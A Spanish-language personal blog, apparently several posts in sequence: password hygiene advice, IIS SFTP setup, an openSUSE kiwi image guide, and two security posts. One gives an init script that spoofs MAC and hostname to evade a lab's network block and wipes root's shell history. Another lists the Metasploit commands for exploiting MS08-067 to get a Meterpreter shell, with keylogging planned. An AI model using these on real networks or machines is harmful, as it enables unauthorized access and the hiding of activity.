Script para cambiar la MAC de una interfaz de red y hostname

Hace ya como un mes presenté un ligero "problema" de bloqueo en cierta red... 

El bloqueo consistía en hacer un filtrado MAC-hostname para evitar que me conectara en uno de los equipos de esa sala de cómputo y que no pudiera acceder a ninguna red :P

El bloqueo era realmente tonto, simplemente cambiando mi mac y claro... el hostname para que no vieran el nombre de la máquina con eso bastaba :P pero para no estarlo haciendo cada que se iniciaba la máquina me hice un script.

Es necesario "runscript". Deben copiar el archivo a "/etc/init.d" con el nombre que gusten. Para iniciarlo pueden poner /etc/init.d/nombre_del_script start

Lo hice de esta forma para evitarme estar regresando manualmente los valores (mac y hostname) que se supone debe tener normalmente el equipo :P simplemente al apagar la computadora se ejecuta el stop (automáticamente) del script...

Ah sí... también borra el historial de la CLI para que al ejecutar history en el próximo reinicio no se vea el " /etc/init.d/nombre_del_script start" :P

Ah y algo más, chequen la ruta de su archivo hostname (en algunos casos es /etc/hostname). Cambien el nombre de la interfaz si es necesario, y en la parte del  stop pongan los valores de hostname y la mac de acuerdo a su equipo!!

#!/sbin/runscript
start()
{
ebegin "Starting service..."
echo hostname=\"androidgz0\" > /etc/conf.d/hostname
rm /root/.bash_history
touch /root/.bash_history
source /etc/conf.d/hostname
ifconfig wlan0 down
ifconfig wlan0 hw ether 0A:0B:11:12:20:01
ifconfig wlan0 up
eend
}


stop()
{
ebegin "Stopping service..."
echo hostname=\"sala1pc01\" > /etc/conf.d/hostname
rm /root/.bash_history
touch /root/.bash_history
source /etc/conf.d/hostname
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:13:F7:11:83:EC
ifconfig wlan0 up
eend
}

Por favor... No anoten sus contraseñas :(

Esta entrada es sólo una opinión, una sugerencia...

En mis cortos 21 años y aun menos, 2 años que llevo en el rollo de la seguridad informática (o al menos queriéndome meter en esto) me he sorprendido de cuántas personas son muy descuidadas y exponen sus usuarios y contraseñas tan fácilmente.

Tan sólo en el último año varios conocidos me han pedido que les ayude a recuperar cuentas de hotmail o de facebook y cosas así. En los días pasados me pidieron (y como a 50 mas xD) que denunciara una cuenta de FB porque la habían robado y andaban haciendo un mal uso de ella.

¿Y por qué sucede esto? La mayoría de las veces porque resulta que anotan sus usuarios y contraseñas, con lujo de detalles en alguna hoja de sus libretas o en algún post-it!! Y peor, cargan estos papelitos consigo a todos lados o los pegan en sus monitores!!

¿Creen que es paranoia? Eso díganselo a aquellas personas que han tenido problemas porque alguien logró acceder a su cuenta de face y anda molestando a todos sus "amigos"...

Esto aplica no sólo a cuentas de correos o de sus redes sociales, sino a cualquier usuario-contraseña que manejen. Si quieren anotar su usuario ok... Pero jamás anoten sus contraseñas!

Guárdenlas en el lugar más seguro que tienen... su cerebro :P Ahí están bien... Y cuidado con la ingeniería social, nunca las digan, ni siquiera den pistas de los datos que contienen... o los que no contienen.

Eso es todo, por favor, no anoten sus contraseñas :(

Videotutorial Instalación y configuracion de un FTP Seguro (SFTP) en IIS. Paso a paso

Esto no es mucho de mi agrado, yo no quería =( pero tuve que hacerlo como examen de parcial en una de las materias de especialidad de Redes de mi uni. En una vemos Linux y en otra Windows, en fin.

Les presento este Video Tutorial sobre cómo realizar la instalación y configuración de un Servidor FTP Seguro o (SFTP). Es decir, el Servidor FTP + SSL.

Se explica desde la instalación de FTP 7.5 que según mis pruebas es el que soporta SSL (versiones anteriores no, lo aprendí a la mala xD).

En el video se explica cómo crear un certificado SelfSigned (autofirmado) y vincularlo a nuestro sitio FTP.

Sin más, aquí les dejo el vídeo, recuerden, para mejor visibilidad, veánlo en pantalla completa.

Ah.. Y orgullosamente el screencast está hecho con ffmpeg :D y editado desde consola con ffmpeg y mencoder \o/

Videotutorial: Obtener un shell de un Windows XP SP3 aka Hackear un Xp usando Metasploit

Por esto es bueno tener siempre tu equipo actualizado, con antivirus, firewalls y mejor aún... Que no sea Windows xD al menos para dificultar un poco las cosas....

Esto es con fines educativos, el uso que se le de depende de cada persona u.u La computadora con la que hice el videotutorial es mía (aunque la está usando mi hermano) así que no he hecho nada malo u.u

¿Qué se va a hacer?

• Obtener un shell de una máquina Windows XP con Service Pack 3 explotando el puerto 445
• Iniciar un keylogger en la máquina víctima.
• Ver procesos ejecutándose y cómo matarlos
• Tomar capturas de pantalla de la víctima
• Lo demás está en tu imaginación.... Puedes hacer lo que quieras, ya estás en la máquina víctima!! XD

¿Qué se necesita?

Una víctima =P, (ruby y rubygems requisito para Metasploit) y Metasploit

Comandos usados (para llegar al shell) en el videotutorial

# cd /opt/framework.../msf3

# ./msfconsole

> use exploit/windows/smb/ms08_067_netapi

>show options

>set rhost IP

>set payload windows/meterpreter/bind_tcp

>show options

>exploit

Ah y por cierto... una disculpa por la mala calidad... no supe usar mis editores de vídeo xD

Vídeo (ver en pantalla completa para mejor visibilidad de las letras):

Crear una imagen personalizada de tu openSUSE //Alternativa a Remastersys

Hace algunos añitos probé en Debian y en Ubuntu una aplicacion llamada Remastersys, lo que hace es crear una imagen a partir del sistema que ya tienes instalado.

Ahora me surgió la necesidad de hacer algo parecido en openSUSE y preguntando e investigando aquí y allá mi profe de Redes me recomendó probar "kiwi".

En realidad fue un tormento porque no encontré mucha información y no tenía idea de cómo empezar xD la única forma en que pude fue D: gráficamente u.u y aquí va....

Primero instalamos kiwi y algunas herramientas de kiwi que se usarán en el proceso:

zypper in kiwi kiwi-config-openSUSE kiwi-desc-isoboot kiwi-desc-usbboot kiwi-desc-vmxboot kiwi-templates kiwi-tools

Nota: Es necesario tener también nuestro DVD de openSUSE...

Y una vez terminado esto nos vamos a Sistema>YaST>Miscelánea>Creador de imágenes

La primera vez que ejecutes esto no aparecerá nada, así que damos clic en Añadir.

Le pones el nombre que quieras, seleccionas Crear desde el principio, Tipo de imagen "Imagen ISO Live" y en Directorio de salida elige el que gustes, por default está /tmp. Por último (en esta seccion) añade, quita o deja los repositorios que gustes... Siguiente

Después de aceptar o ignorar lo que se muestre... (ya veras a lo que me refiero) pasamos a los ultimos pasos. En la nueva ventana agregamos los paquetes que querramos (clic en cambiar) yo agregue ClamAV, ruby, rubygems y otros mas, tu agrega o quita los que quieras, es tu imagen :P 

Selecciona el tamaño de tu ISO (yo la puse de 4200MB) y clic en Descripcion

Cambia los datos que gustes.... La distribucion del teclado, la configuracion (para distribucion española "es") y clic en Usuarios

Agrega los usuarios que gustes, asígnales una contraseña, lo que tu quieras hacerles y damos clic en Terminar... Las otras opciones (Guiones y Directorios mejor las dejamos así.... xD) Ah... Recuerda tener insertado tu disco de openSUSE sino marcará algunos errores u.u

Una vez dado clic en Terminar ve por un café, tómate una pequeña siesta en fin, vuelve en un par de horas para cuando vaya a terminar por fin la creacion de la imagen! Si... demora de 2 a 3 horitas :P

Y cuando al fin diga "Creacion de la imagen terminada" en la carpeta que elegimos al principio (si no cambiaste tmp, en esa) ahí estará la ISO del sistema que acabas de personalizar :D

Puedes probarla antes con alguna maquina virtual o bien quémala ya en un DVD o grábala en un pendrive....

Es todo, espero que les sea de utilidad :D bye!